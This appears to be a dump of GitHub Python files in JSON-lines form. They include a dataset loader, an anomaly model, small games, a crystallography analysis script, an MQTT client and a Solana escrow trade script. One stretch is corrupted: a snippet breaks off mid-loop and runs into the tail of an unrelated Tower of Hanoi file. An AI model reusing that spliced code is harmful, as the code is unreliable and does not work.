self.val_file_path\n","repo_name":"Andreasgejlm/SingleCGHModel","sub_path":"DataProvider/CGHDataProvider.py","file_name":"CGHDataProvider.py","file_ext":"py","file_size_in_byte":19898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73651782884","text":"import pandas as pd\nimport urllib\nimport sys\n\n\ndef get_schedules(url_link):\n\n schedules = []\n\n for i in range(len(pd.read_html(url_link, flavor=\"lxml\"))):\n try:\n df = pd.read_html(url_link, flavor=\"lxml\")[i]\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n schedules.append(df.to_dict('records'))\n except urllib.error.URLError:\n print('\\nGiven values are not correct. Rerun the script.\\n')\n sys.exit(2)\n\n return schedules\n\n\ndef get_rooms(room):\n df = pd.read_html(\n 'http://www.cs.ubbcluj.ro/files/orar/2018-2/sali/legenda.html', flavor=\"lxml\")[0]\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n rooms = df.to_dict('records')\n for r in rooms:\n if r['Sala'] == room:\n return f'{r[\"Sala\"]} - {(r[\"Localizarea\"])}'\n","repo_name":"andreicorpo/ubb_IG_python_schedule_script","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13676103854","text":"\"\"\"ACDC dataset\"\"\"\nimport os\nimport torch\nimport numpy as np\nimport logging\nimport glob\n\nfrom PIL import Image\nfrom .seg_data_base import SegmentationDataset\nimport random\n\n\nclass ACDCSegmentation(SegmentationDataset):\n BASE_DIR = 'acdc'\n NUM_CLASS = 19\n\n def __init__(self, root='datasets/acdc', split='train', mode=None, transform=None, **kwargs):\n super(ACDCSegmentation, self).__init__(root, split, mode, transform, **kwargs)\n assert os.path.exists(self.root), \"Please put dataset in {SEG_ROOT}/datasets/acdc\"\n self.images, self.mask_paths = _get_acdc_pairs(self.root, self.split)\n assert (len(self.images) == len(self.mask_paths))\n if len(self.images) == 0:\n raise RuntimeError(\"Found 0 images in subfolders of:\" + root + \"\\n\")\n self.valid_classes = [7, 8, 11, 12, 13, 17, 19, 20, 21, 22,\n 23, 24, 25, 26, 27, 28, 31, 32, 33]\n self._key = np.array([-1, -1, -1, -1, -1, -1,\n -1, -1, 0, 1, -1, -1,\n 2, 3, 4, -1, -1, -1,\n 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15,\n -1, -1, 16, 17, 18])\n self._mapping = np.array(range(-1, len(self._key) - 1)).astype('int32')\n\n def _class_to_index(self, mask):\n values = np.unique(mask)\n for value in values:\n assert (value in self._mapping)\n index = np.digitize(mask.ravel(), self._mapping, right=True)\n return self._key[index].reshape(mask.shape)\n def _val_sync_transform_resize(self, img, mask):\n w, h = img.size\n x1 = random.randint(0, w - self.crop_size[1])\n y1 = random.randint(0, h - self.crop_size[0])\n img = img.crop((x1, y1, x1 + self.crop_size[1], y1 + self.crop_size[0]))\n mask = mask.crop((x1, y1, x1 + self.crop_size[1], y1 + self.crop_size[0]))\n\n img, mask = self._img_transform(img), self._mask_transform(mask)\n return img, mask\n\n def __getitem__(self, index):\n img = Image.open(self.images[index]).convert('RGB')\n if self.mode == 'test':\n if self.transform is not None:\n img = self.transform(img)\n return img, os.path.basename(self.images[index])\n mask = Image.open(self.mask_paths[index])\n if self.mode == 'train':\n img, mask = self._sync_transform(img, mask, resize=True)\n elif self.mode == 'val':\n img, mask = 
self._val_sync_transform_resize(img, mask)\n else:\n assert self.mode == 'testval'\n img, mask = self._val_sync_transform_resize(img, mask)\n if self.transform is not None:\n img = self.transform(img)\n return img, mask, os.path.basename(self.images[index])\n\n def _mask_transform(self, mask):\n target = self._class_to_index(np.array(mask).astype('int32'))\n return torch.LongTensor(np.array(target).astype('int32'))\n\n def __len__(self):\n return len(self.images)\n\n @property\n def pred_offset(self):\n return 0\n\n @property\n def classes(self):\n \"\"\"Category names.\"\"\"\n return ('road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light',\n 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car',\n 'truck', 'bus', 'train', 'motorcycle', 'bicycle')\n\n\ndef _get_acdc_pairs(folder, split='train'):\n img_paths = []\n mask_paths = []\n if split == 'test':\n split = 'val'\n img_paths_temp = glob.glob(os.path.join(folder, 'rgb_anon/*/{}/*/*_rgb_anon.png'.format(split)))\n for imgpath in img_paths_temp:\n maskpath = imgpath.replace('/rgb_anon/', '/gt/').replace('rgb_anon.png', 'gt_labelIds.png')\n if os.path.isfile(imgpath) and os.path.isfile(maskpath):\n img_paths.append(imgpath)\n mask_paths.append(maskpath)\n else:\n logging.info('cannot find the mask or image: %s %s', imgpath, maskpath)\n logging.info('Found {} images in the folder {}'.format(len(img_paths), folder))\n return img_paths, mask_paths\n\n\nif __name__ == '__main__':\n dataset = ACDCSegmentation()\n","repo_name":"jamycheung/Trans4Trans","sub_path":"segmentron/data/dataloader/acdc.py","file_name":"acdc.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"}
+{"seq_id":"24918501555","text":"\"\"\"\nLightGBM\n-----------------\n\"\"\"\n\nfrom typing import Any\nfrom functools import partial\n\nfrom darts import models\nimport numpy as np\nimport numpy.typing as npt\nimport optuna\n\nfrom oats.models._darts_simple import SimpleDartsModel\n\n\nclass LightGBMModel(SimpleDartsModel):\n \"\"\"LightGBM Model\n\n Using regression via gradient boosted trees as a predictor. Anomaly scores are deviations from predictions.\n\n Reference: https://unit8co.github.io/darts/generated_api/darts.models.forecasting.gradient_boosted_model.html\n \"\"\"\n\n def __init__(\n self,\n window: int = 10,\n n_steps: int = 1,\n lags: int = 1,\n val_split: float = 0.0,\n **kwargs\n ):\n \"\"\"\n Initialization also accepts any parameters used by: https://unit8co.github.io/darts/generated_api/darts.models.forecasting.gradient_boosted_model.html\n\n Args:\n window (int, optional): rolling window size to feed into the predictor. Defaults to 10.\n n_steps (int, optional): number of steps to predict forward. Defaults to 1.\n lags (int, optional): number of lags. Defaults to 1.\n val_split (float, optional): proportion of data points reserved for validation; only used if using auto-tuning (not tested). 
Defaults to 0.\n \"\"\"\n\n model_cls = models.LightGBMModel\n\n super().__init__(model_cls, window, n_steps, lags, val_split, **kwargs)\n\n def _model_objective(self, trial, train_data: npt.NDArray[Any]):\n params = {\n \"lambda_l1\": trial.suggest_loguniform(\"lambda_l1\", 1e-8, 10.0),\n \"lambda_l2\": trial.suggest_loguniform(\"lambda_l2\", 1e-8, 10.0),\n \"num_leaves\": trial.suggest_int(\"num_leaves\", 2, 256),\n \"feature_fraction\": trial.suggest_uniform(\"feature_fraction\", 0.4, 1.0),\n \"bagging_fraction\": trial.suggest_uniform(\"bagging_fraction\", 0.4, 1.0),\n \"bagging_freq\": trial.suggest_int(\"bagging_freq\", 1, 7),\n \"min_child_samples\": trial.suggest_int(\"min_child_samples\", 5, 100),\n }\n\n return self._get_hyperopt_res(params, train_data)\n","repo_name":"georgian-io/pyoats","sub_path":"oats/models/predictive/lightgbm.py","file_name":"lightgbm.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"52"} +{"seq_id":"8620786860","text":"l=int(input())\nwhile l>0:\n\tprev=\"+x\";\n\tnext=\"\";\n\tcurr = raw_input().split()\n\ti=0\n\twhile i\"\n return disk_str\n\n\ndef str_to_int(string):\n s = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n lookup = {alphabet[i]: i for i in range(len(alphabet))}\n for letter in string:\n try:\n s += lookup[letter]\n except KeyError:\n pass\n return s\n","repo_name":"gabrielok/Tower-of-Hanoi","sub_path":"pile.py","file_name":"pile.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32272840511","text":"import pygame\nimport class_game\nimport class_menu\n\npygame.init()\nwindow = pygame.display.set_mode((510,620))\nscreen = pygame.Surface((500,500))\nscreen.fill( (0,0,0) )\ngame = class_game.GAME()\ngame.init()\nmenu = class_menu.MENU()\nmenu.init(window, game.score)\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tFinished = True\n\t\t\tbreak\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_w:\n\t\t\t\tgame.direction = \"up\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_s:\n\t\t\t\tgame.direction = \"down\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_a:\n\t\t\t\tgame.direction = \"left\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_d:\n\t\t\t\tgame.direction = \"right\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame.Finished = True\n\t\t\t\tbreak\n\tif game.Finished == True:\n\t\tbreak\n\twindow.blit(screen , (5,115) )\n\tgame.draw(screen)\n","repo_name":"kramlex/pygame-2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70761666404","text":"import numpy as np\nfrom matplotlib import pyplot, cm\nfrom scipy.optimize import minimize\nfrom scipy.special import erfinv\nfrom scipy.stats import norm\n\nfrom hikari.dataframes import HklFrame, ResFrame\nfrom hikari.symmetry import SG\nfrom hikari.utility import make_abspath\n\n\ndef baycon_plot(x_key='ze', y_key='si',\n a=10.0, b=10.0, c=10.0, al=90.0, be=90.0, ga=90.0,\n input_path='shelx.fcf',\n input_format='shelx_fcf',\n 
input_wavelength='MoKa',\n output_path='baycon.png'):\n \"\"\"\n For a given .fcf file prepare a bayesian conditional probability plot\n between x_key and y_key.\n\n :param x_key: Parameter of HklFrame which will be placed on x axis\n :type x_key: str\n :param y_key: Parameter of HklFrame which will be placed on x axis\n :type y_key: str\n :param a: Unit cell parameter *a* in Angstrom.\n :type a: float\n :param b: Unit cell parameter *b* in Angstrom.\n :type b: float\n :param c: Unit cell parameter *c* in Angstrom.\n :type c: float\n :param al: Unit cell parameter *alpha* in degrees.\n :type al: float\n :param be: Unit cell parameter *alpha* in degrees.\n :type be: float\n :param ga: Unit cell parameter *alpha* in degrees.\n :type ga: float\n :param input_path: Path to the input .fcf file.\n :type input_path: str\n :param input_format: Format of the input .fcf file. For reference see\n :meth:`hikari.dataframes.HklFrame.interpret_hkl_format`.\n :type input_format: int or str or dict\n :param input_wavelength: Wavelength of radiation utilised in experiment.\n :type input_wavelength: float or str\n :param output_path: Path to the output .png file.\n :type output_path: str\n \"\"\"\n no_of_bins = 10\n p = HklFrame()\n p.edit_cell(a=a, b=b, c=c, al=al, be=be, ga=ga)\n p.la = input_wavelength\n p.read(make_abspath(input_path), input_format)\n p.place()\n p.calculate_fcf_statistics()\n x = p.table.loc[:, x_key].rank(pct=True).to_numpy()\n y = p.table.loc[:, y_key].rank(pct=True).to_numpy()\n bins = np.zeros(shape=(no_of_bins, no_of_bins))\n lims = [-1.e-8] + [(i + 1) / no_of_bins for i in range(no_of_bins)]\n for i in range(no_of_bins):\n for j in range(no_of_bins):\n bins[i, j] = ((lims[i] < x) & (x <= lims[i+1]) &\n (lims[j] < y) & (y <= lims[j+1])).sum()\n n_avg = len(x) / no_of_bins ** 2\n chi2 = np.sum((bins - n_avg) ** 2 / n_avg)\n fig = pyplot.figure()\n ax = fig.add_subplot(111, aspect='equal')\n pyplot.xlim(0, 1)\n pyplot.ylim(0, 1)\n h = ax.hist2d(x, y, bins=no_of_bins, alpha=0.25, cmap=cm.get_cmap('PiYG'))\n cb = pyplot.colorbar(h[3], ax=ax)\n cb.set_label('Number of observations')\n ax.scatter(x=x, y=y, s=5.0, c='#000080', marker='.', alpha=0.75)\n pyplot.title('Bayesian CoNditional probability, chi2 = {:.2f}'.format(chi2))\n pyplot.xlabel('\"' + x_key + '\" rank')\n pyplot.ylabel('\"' + y_key + '\" rank')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef observed_vs_calculated_plot(input_path='shelx.fcf',\n input_format='shelx_fcf',\n output_path='Io_vs_Ic.png'):\n p = HklFrame()\n p.read(make_abspath(input_path), input_format)\n icalc = p.table.loc[:, 'Ic'].to_numpy()\n iobs = p.table.loc[:, 'I'].to_numpy()\n i_min = min(np.min(icalc[icalc > 0]), np.min(iobs[iobs > 0]))\n i_max = max(np.max(icalc[icalc > 0]), np.max(iobs[iobs > 0]))\n fig = pyplot.figure()\n ax = fig.add_subplot(111) # , aspect='equal'\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlim([i_min, i_max])\n ax.set_ylim([i_min, i_max])\n ax.plot(np.linspace(0, i_max), np.linspace(0, i_max), '-k', lw=1, zorder=0)\n ax.scatter(x=icalc, y=iobs, s=5.0, c='r', marker='.', alpha=0.75, zorder=10)\n pyplot.title('Calculated vs observed intensities plot')\n pyplot.xlabel('I_cal')\n pyplot.ylabel('I_obs')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef normal_probability_plot(input_path='shelx.fcf',\n input_format='shelx_fcf',\n output_path='Io_vs_Ic.png'):\n\n # scale factors\n a = 0.1000\n b = 0.0\n\n p = HklFrame()\n 
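# NOTE: the weighting below appears to follow the SHELXL scheme, sigma_w =\n # sqrt(sigma^2 + (a*P)^2 + b*P) with P = (I_obs + 2*I_calc)/3, where a and b\n # are the scale factors hard-coded at the top of this function.\n 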
p.read(make_abspath(input_path), input_format)\n i_obs = p.table.loc[:, 'I'].to_numpy()\n i_calc = p.table.loc[:, 'Ic'].to_numpy()\n si = p.table.loc[:, 'si'].to_numpy()\n p = 1/3 * i_obs + 2/3 * i_calc\n si = np.sqrt(si ** 2 + (a * p) ** 2 + b * p)\n\n # expected delta m\n def delta_m(f1, f2, k, si1, si2):\n return np.sort((f1 - k * f2) / np.sqrt(si1 ** 2 + k **2 * si2 ** 2))\n\n def sum_of_delta_m_squared(k):\n return np.sum(delta_m(i_obs, i_calc, k, si, np.zeros_like(si)) ** 2)\n\n def scale_factor():\n return minimize(sum_of_delta_m_squared, x0=np.array([1.0])).x[0]\n\n experiment_delta_m = delta_m(f1=i_obs, f2=i_calc, k=scale_factor(),\n si1=si, si2=np.zeros_like(si))\n experiment_delta_m = experiment_delta_m / np.std(experiment_delta_m)\n\n # simulated delta m\n uniform = (np.arange(len(experiment_delta_m))+0.5) / len(experiment_delta_m)\n simulated_delta_m = [erfinv(-1 + 2 * q) for q in uniform]\n\n # drawing the plot\n fig = pyplot.figure()\n ax = fig.add_subplot(111, aspect='equal')\n ax.set_xlim([-5, 5])\n ax.set_ylim([-5, 5])\n pyplot.hist(experiment_delta_m, bins=100, density=True)\n ax.scatter(experiment_delta_m, simulated_delta_m, s=5.0, c='r', marker='.',\n alpha=0.75, zorder=10)\n ax.plot(np.linspace(-3, 3), np.linspace(-3, 3), '-k', lw=1, zorder=0)\n pyplot.plot(6 * uniform - 3, norm.pdf(6 * uniform - 3))\n pyplot.title('npp')\n pyplot.xlabel('delta_m experiment')\n pyplot.ylabel('delta_m simulated')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef fcf_descriptors(input_path='shelx.fcf', input_format='shelx_fcf'):\n # scale factors\n a = 0.1000\n b = 0.0\n\n p = HklFrame()\n p.read(make_abspath(input_path), input_format)\n i_obs = p.table.loc[:, 'I'].to_numpy()\n i_calc = p.table.loc[:, 'Ic'].to_numpy()\n si = p.table.loc[:, 'si'].to_numpy()\n p = 1/3 * i_obs + 2/3 * i_calc\n si_weighted = np.sqrt(si ** 2 + (a * p) ** 2 + b * p)\n ze = (i_obs - i_calc) / si_weighted\n f_calc = np.sqrt(np.abs(i_calc)) * np.sign(i_calc)\n f_obs = np.sqrt(np.abs(i_obs)) * np.sign(i_obs)\n one_over_sf = (2 * abs(i_obs) ** 0.5) / si\n\n r1 = np.sum(np.abs(f_obs - f_calc)) / np.sum(np.abs(f_obs))\n wr2 = np.sqrt(\n np.sum(np.abs(si_weighted * np.abs(i_obs - i_calc) ** 2)) /\n np.sum(np.abs(si_weighted * i_obs ** 2)))\n awr2 = np.sqrt(\n (np.mean((i_obs - i_calc) ** 2) / np.mean(si_weighted ** 2)) /\n np.mean((i_obs / si_weighted) ** 2))\n gof_if_alpha_equal_one = np.sqrt(np.mean(ze ** 2))\n agof_if_alpha_equal_one = np.sqrt(\n np.mean((i_obs - i_calc) ** 2) /\n np.mean(si_weighted ** 2))\n\n print('R1 = {:f}'.format(r1))\n print('wR2 = {:f}'.format(wr2))\n print('awR2 = {:f}'.format(awr2))\n print('GoF* = {:f}'.format(gof_if_alpha_equal_one))\n print('aGoF* = {:f}'.format(agof_if_alpha_equal_one))\n\n\ndef calculate_sample_form_factors(a, b, c, al, be, ga, space_group, res_path):\n \"\"\"\n Estimate and print selected IAM XRD form factors for given crystal structure\n\n :param a: Unit cell parameter *a* in Angstrom.\n :type a: float\n :param b: Unit cell parameter *b* in Angstrom.\n :type b: float\n :param c: Unit cell parameter *c* in Angstrom.\n :type c: float\n :param al: Unit cell parameter *alpha* in degrees.\n :type al: float\n :param be: Unit cell parameter *alpha* in degrees.\n :type be: float\n :param ga: Unit cell parameter *alpha* in degrees.\n :type ga: float\n :param space_group: Short Hermann-Mauguin name or index of space group.\n For details see table in hikari.symmetry.space_groups.\n :type space_group: str or int\n :param res_path: 
Absolute or relative path to the input .res file.\n :type res_path: str\n :return: None\n :rtype: None\n \"\"\"\n r = ResFrame()\n r.read(make_abspath(res_path))\n r.edit_cell(a=a, b=b, c=c, al=al, be=be, ga=ga)\n hkl = np.array([(0, 0, 0), (1, 1, 1), (2, 2, 2), (2, 0, 0), (0, 0, 3),\n (1, 0, 1), (1, 1, 8), (5, 0, 2), (4, 4, 0), (2, 0, 6),\n (2, 0, 1), (2, 0, 2), (2, 0, 3), (2, 0, 4), (2, 0, 5),\n (5, 9, 9), (0, 0, 10), (0, 2, 10), (0, 4, 10)])\n f = r.form_factor(np.array(hkl), SG[space_group])\n f2 = f * np.conj(f)\n for _hkl, _f, _f2 in zip(hkl, f, f2):\n print(f'{_hkl}: {_f2:12f} --- {_f}')\n\n\nif __name__ == '__main__':\n # calculate_sample_form_factors(a=5.64109, b=5.64109, c=5.64109,\n # al=90, be=90, ga=90, space_group='Fm-3m',\n # res_path='~/x/NaCl/cifmaking/NaCl_more_res.res')\n calculate_sample_form_factors(a=7.210241, b=16.487567, c=11.279203,\n al=90, be=90, ga=90, space_group='Pnma',\n res_path='~/x/HP/2oAP/_/_.res')\n","repo_name":"Baharis/hikari","sub_path":"hikari/scripts/fcf.py","file_name":"fcf.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71507357606","text":"from tkinter import *\r\n\r\n\r\ndef fun():\r\n if v.get() == 1:\r\n lblL.configure(text='You pressed radiobutton 1')\r\n else:\r\n lblL.configure(text='You pressed radiobutton 2')\r\n\r\n\r\nroot = Tk()\r\n\r\nv = IntVar()\r\nRadiobutton(root, text='DIT', variable=v, \\\r\n value=1, command=fun).pack(anchor=W)\r\nRadiobutton(root, text='UIT', variable=v, \\\r\n value=2, command=fun).pack(anchor=W)\r\n\r\nlblL = Label(root)\r\nlblL.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"bansalkanav/python_notes","sub_path":"16. GUI-2/demo_4.py","file_name":"demo_4.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"52"} +{"seq_id":"15919469711","text":"from json import loads\nfrom typing import Dict\n\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom twisted.internet.defer import inlineCallbacks\n\nfrom Actuators import Actuators\n\n\nclass AppSession(ApplicationSession):\n\n def onConnect(self):\n self.join(self.config.realm, [u\"ticket\"], crossbar.get('ticket'))\n\n def onChallenge(self, challenge):\n if challenge.method == u\"ticket\":\n return crossbar.get('ticket')\n else:\n raise Exception(\"Invalid authmethod {}\".format(challenge.method))\n\n @inlineCallbacks\n def onJoin(self, details):\n for id, callback in actuators.on_join():\n yield self.register(callback, crossbar['prefix'] + '.actuator.' 
+ id)\n\n\nif __name__ == '__main__':\n try:\n with open('env.json', 'r') as f:\n conf = loads(f.read())\n except Exception as e:\n raise e\n actuators = Actuators(conf.get('actuators', []))\n\n if conf.get('crossbar') is None:\n raise Exception(\"Crossbar config is required\")\n crossbar: Dict[str, str] = conf.get('crossbar')\n aux = crossbar.get('host').split('.')\n aux.reverse()\n crossbar.update({\n 'prefix': '.'.join(aux)\n })\n del aux\n url = 'ws://' + crossbar.get('host', '127.0.0.1') + '/ws'\n runner = ApplicationRunner(url, 'realm1')\n runner.run(AppSession, auto_reconnect=True)\n","repo_name":"pedromneto97/Raspberry-Light-Control","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17564595785","text":"'''\nCreated on Jan 25, 2020\n\n@author: Taffarello\n'''\nimport unittest\nfrom models import database\nimport ambar\nfrom sqlalchemy import create_engine\nfrom flask import Flask\nimport json\nfrom models.cidadeModel import CidadeModel\nfrom application import cidadeController \n\n\nTEST_DB = 'unittest.db'\n\nclass CidadeControllerTests(unittest.TestCase):\n def setUp(self):\n ambar.app.config['TESTING'] = True\n ambar.app.config['WTF_CSRF_ENABLED'] = False\n ambar.app.config['DEBUG'] = False\n ambar.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+ TEST_DB\n \n self.client = ambar.app.test_client()\n \n engine = create_engine(ambar.app.config['SQLALCHEMY_DATABASE_URI'])\n database.Session.configure(bind=engine) \n database.Base.metadata.drop_all(engine)\n database.Base.metadata.create_all(engine)\n \n # Disable sending emails during unit testing\n #ambar.mail.init_app(ambar.app)\n self.assertEqual(ambar.app.debug, False)\n \n def test_getCidadeInexistente(self):\n dados = {'name': 'Test','state' : 'sp', 'country':'braz','id':555}\n session = database.Session()\n cidade = cidadeController.getCidade(dados['id'], dados,session) \n self.assertEqual(cidade.id, dados['id'], 'recuperando cidade do banco')\n self.assertEqual(cidade.nome, dados['name'], 'recuperando cidade do banco')\n self.assertEqual(cidade.estado, dados['state'], 'recuperando cidade do banco')\n self.assertEqual(cidade.pais, dados['country'], 'recuperando cidade do banco')\n \n def test_getCidadeExistente(self):\n dados = {'name': 'Test','state' : 'sp', 'country':'braz','id':999}\n session = database.Session()\n cidadeController.getCidade(dados['id'], dados,session)\n session.commit()\n cidade = cidadeController.getCidade(dados['id'], dados,session) #fazendo duas vezes para simular uma cidade já cadastrada\n \n self.assertEqual(cidade.id, dados['id'], 'recuperando cidade do banco')\n self.assertEqual(cidade.nome, dados['name'], 'recuperando cidade do banco')\n self.assertEqual(cidade.estado, dados['state'], 'recuperando cidade do banco')\n self.assertEqual(cidade.pais, dados['country'], 'recuperando cidade do banco')\n\n \nif __name__ == \"__main__\":\n unittest.main() \n ","repo_name":"andretaff/ambar","sub_path":"source/tests/tests_cidadeController.py","file_name":"tests_cidadeController.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25960220195","text":"import paho.mqtt.client as mqtt\nfrom threading import Thread\nimport json\n\n\nclass MqttClient(Thread):\n def __init__(self, name, client_uid, topics, publish_topic, thread_q):\n Thread.__init__(self)\n 
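# Daemonize this worker thread so the blocking MQTT network loop cannot\n # keep the interpreter alive on shutdown.\n 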
self.daemon = True\n self.name = name\n self.connected = False\n self.cached_data_to_file = False\n self.topics = topics\n self.client_uid = client_uid\n self.publish_topic = publish_topic\n self.thread_q = thread_q\n self.cache_file_handler = open(\"cache_file\", \"a+\")\n\n def run(self):\n self.client.loop_forever()\n\n def on_message_handler(self, client, user_data, msg):\n # print(\"new message\", msg.payload)\n # set the data onto the shared queue for consumers to use it\n self.thread_q.put(msg.payload)\n\n def on_connect_handler(self, client, user_data, flags, return_code):\n if return_code == 0:\n print(self.name + \" Connected with result code \" + str(return_code))\n self.connected = True\n self.subscribe()\n if self.cached_data_to_file:\n self.__send_cached_frames()\n\n def on_subscribe_handler(self, client, obj, mid, granted_ops):\n print(self.name + \" subscribed to topic\", str(mid))\n\n def on_publish_handler(self, client, userdata, result):\n print(\"data published\\n\")\n\n def on_disconnect_handler(self, client, userdata, rc):\n self.connected = False\n print(self.name + \" disconnected from broker\")\n\n def create_client(self):\n self.client = mqtt.Client(\n client_id=self.name, clean_session=True)\n\n def subscribe(self):\n self.client.subscribe(self.topics)\n\n # publisher\n def publish_data(self, json_in_str):\n if self.connected:\n # connected so send it over mqtt\n self.client.publish(self.publish_topic, json_in_str)\n print(\"Sent frame to server\")\n else:\n # print(json_in_str)\n self.cached_data_to_file = True\n self.cache_file_handler.write(json_in_str + \"\\n\")\n self.cache_file_handler.flush()\n print(\"Cached frame in file\")\n\n def __send_cached_frames(self):\n print(\"Running internal function to send cached frames to server\")\n # print(self.connected)\n if self.connected:\n lines_from_file = open(\"cache_file\", \"r\").read()\n lines_from_file_split = lines_from_file.split(\"\\n\")\n # print(lines_from_file_split)\n # remove last empty string character '' from the split function\n lines_from_file_split.pop()\n lines_from_file_split = [json.loads(\n i) for i in lines_from_file_split]\n frame_array_to_send = {\"cached_frames\": lines_from_file_split}\n # connected send it over mqtt\n # print(json.dumps(frame_array_to_send))\n self.client.publish('cache_frame_topic',\n json.dumps(frame_array_to_send))\n self.cached_data_to_file = False\n # reset the file/ truncate it\n self.cache_file_handler.seek(0, 0)\n self.cache_file_handler.truncate()\n print(\"sent cached frames to server\")\n else:\n print(\"Still no internet, continuing caching of frames to file\")\n","repo_name":"itspa1/shop-analytics-pi","sub_path":"mqttClient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
+{"seq_id":"41706640834","text":"# -*- coding: utf-8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom magi.utils import LANGUAGES_DICT\nfrom magi.management.commands.populate_staffconfigurations import create\nfrom magi import models as magi_models\nfrom magi.urls import RAW_CONTEXT\nfrom starlight import models\n\nclass Command(BaseCommand):\n can_import_settings = True\n\n def handle(self, *args, **options):\n\n ##################################\n # Non translatable\n\n for rarity in models.Card.RARITIES.keys():\n create({\n 'key': u'rarity_{}_cost'.format(rarity),\n 'verbose_key': u'Cost of a card rarity {}'.format(rarity),\n })\n 
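# a matching memoir-specific cost entry is created for the same rarity below\n 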
create({\n 'key': u'memoir_rarity_{}_cost'.format(rarity),\n 'verbose_key': u'Cost of a memoir rarity {}'.format(rarity),\n })\n\n create({\n 'key': 'max_level',\n 'verbose_key': 'Max level',\n })\n\n ##################################\n # Fill up default values\n\n magi_models.StaffConfiguration.objects.update_or_create(\n key='get_started', i_language='en',\n defaults={\n 'value': u\"\"\"# Start sharing your collection of cards!\n\n1. Open the game, then:\n - Tap ![]({static_url}img/get_started_settings.png) **Other** (\"その他\")\n - Tap ![]({static_url}img/get_started_gallery.png) **Gallery** (\"ギャラリー\")\n - Tap ![]({static_url}img/get_started_stage_girls.png) **Stage Girls** (\"舞台少女\").\n2. Tap the sorting button (top right) and sort by **ID**.\n3. Go through the list of cards below and click \"+\" on the ones you have to add them to your Starlight Academy collection!\n\n*For more options, go to your profile or the [list of cards](/cards/).*\n\"\"\".format(\n static_url=RAW_CONTEXT['static_url'],\n),\n })\n","repo_name":"MagiCircles/RevueStarlight","sub_path":"starlight/management/commands/populate_staffconfigurations_starlight.py","file_name":"populate_staffconfigurations_starlight.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"5412878466","text":"from solana.rpc.async_api import AsyncClient\nimport json\nfrom spl.token.constants import TOKEN_PROGRAM_ID\nfrom solana.publickey import PublicKey\nfrom solana.keypair import Keypair\nfrom solana.transaction import TransactionInstruction, AccountMeta, Transaction\nfrom solana.rpc.commitment import Confirmed\nimport asyncio\nfrom solders.pubkey import Pubkey # type: ignore\nfrom utils import (\n get_account_info,\n ESCROW_ACCOUNT_SCHEMA,\n EscrowProgramClass,\n construct_payload,\n EscrowInstructions,\n)\nfrom pprint import pprint as pp\nfrom tabulate import tabulate\n\n\nasync def take_trade():\n client = AsyncClient(\"http://localhost:8899\", commitment=Confirmed)\n keys = json.load(open(\"keys.json\", \"r\"))\n config = json.load(open(\"config.json\", \"r\"))\n program_id = PublicKey(config[\"program_id\"])\n expected_amount = config[\"initlizer_expected_ammount\"]\n taker_wallet = PublicKey(keys[\"taker_wallet\"])\n taker_y_account = PublicKey(keys[\"taker_y_account\"])\n taker_x_account = PublicKey(keys[\"taker_x_account\"])\n escrow_account = PublicKey(keys[\"escrow_account\"])\n initlizer_x_account = PublicKey(keys[\"initializer_x_account\"])\n\n account_info: EscrowProgramClass = await get_account_info(\n escrow_account, ESCROW_ACCOUNT_SCHEMA, client\n )\n initlizer_y_account = 